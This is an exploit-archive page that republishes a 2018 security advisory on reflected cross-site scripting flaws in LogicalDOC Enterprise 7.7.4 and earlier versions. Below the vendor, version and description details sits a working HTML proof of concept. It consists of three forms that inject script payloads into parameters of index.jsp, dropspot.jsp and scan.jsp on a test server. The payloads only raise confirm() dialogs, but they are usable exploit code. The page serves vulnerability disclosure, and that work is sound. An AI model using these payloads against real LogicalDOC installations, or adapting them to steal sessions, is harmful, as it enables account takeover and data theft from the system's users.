Exploit the possiblities

LogicalDOC Enterprise 7.7.4 Reflected Cross Site Scripting

LogicalDOC Enterprise 7.7.4 Reflected Cross Site Scripting
Posted Feb 12, 2018
Authored by LiquidWorm | Site zeroscience.mk

LogicalDOC Enterprise version 7.7.4 suffers from reflected cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 86803762f6ec08d63b2138780616ee41

LogicalDOC Enterprise 7.7.4 Reflected Cross Site Scripting

Change Mirror Download
<!--

LogicalDOC Enterprise 7.7.4 Reflected Cross-Site Scripting Vulnerabilities


Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
7.7.3
7.7.2
7.7.1
7.6.4
7.6.2
7.5.1
7.4.2
7.1.1

Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.

Desc: LogicalDOC suffers from multiple reflected XSS vulnerabilities when input
passed via several parameters to several scripts is not properly sanitized before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

Tested on: Microsoft Windows 10
Linux Ubuntu 16.04
Java 1.8.0_161
Apache-Coyote/1.1
Apache Tomcat/8.5.24
Apache Tomcat/8.5.13
Undisclosed 8.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5449
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5449.php


26.01.2018

-->


<html>
<body>

<script>history.pushState('', '', '/')</script>

<form action="http://192.168.1.74:8080/prev/index.jsp">
<input type="hidden" name="docId" value="3833857" />
<input type="hidden" name="fileVersion" value="251';confirm(1)//" />
<input type="hidden" name="locale" value="en_US';confirm(2)//" />
<input type="submit" value="XSS.1" />
</form>

<form action="http://192.168.1.74:8080/webstart/dropspot.jsp">
<input type="hidden" name="random" value="1517777865957" />
<input type="hidden" name="language" value="en_US<script>confirm(3)</script>" />
<input type="hidden" name="docLanguage" value="en<script>confirm(4)</script>" />
<input type="hidden" name="baseUrl" value="http://192.168.1.74:8080" />
<input type="hidden" name="sid" value="b0b43ae7-896e-46d6-a4b9-74af03005e3b" />
<input type="hidden" name="folderId" value="4" />
<input type="hidden" name="disallow" value="exe,iso<script>confirm(5)</script>" />
<input type="hidden" name="sizeMax" value="104857600<script>confirm(6)</script>" />
<input type="submit" value="XSS.2" />
</form>

<form action="http://192.168.1.74:8080/webstart/scan.jsp">
<input type="hidden" name="random" value="1517777814854" />
<input type="hidden" name="language" value="en_US<script>confirm(7)</script>" />
<input type="hidden" name="docLanguage" value="en<script>confirm(8)</script>" />
<input type="hidden" name="baseUrl" value="http://192.168.1.74:8080" />
<input type="hidden" name="sid" value="b0b43ae7-896e-46d6-a4b9-74af03005e3b" />
<input type="hidden" name="targetFolderId" value="4" />
<input type="submit" value="XSS.3" />
</form>

</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    11 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close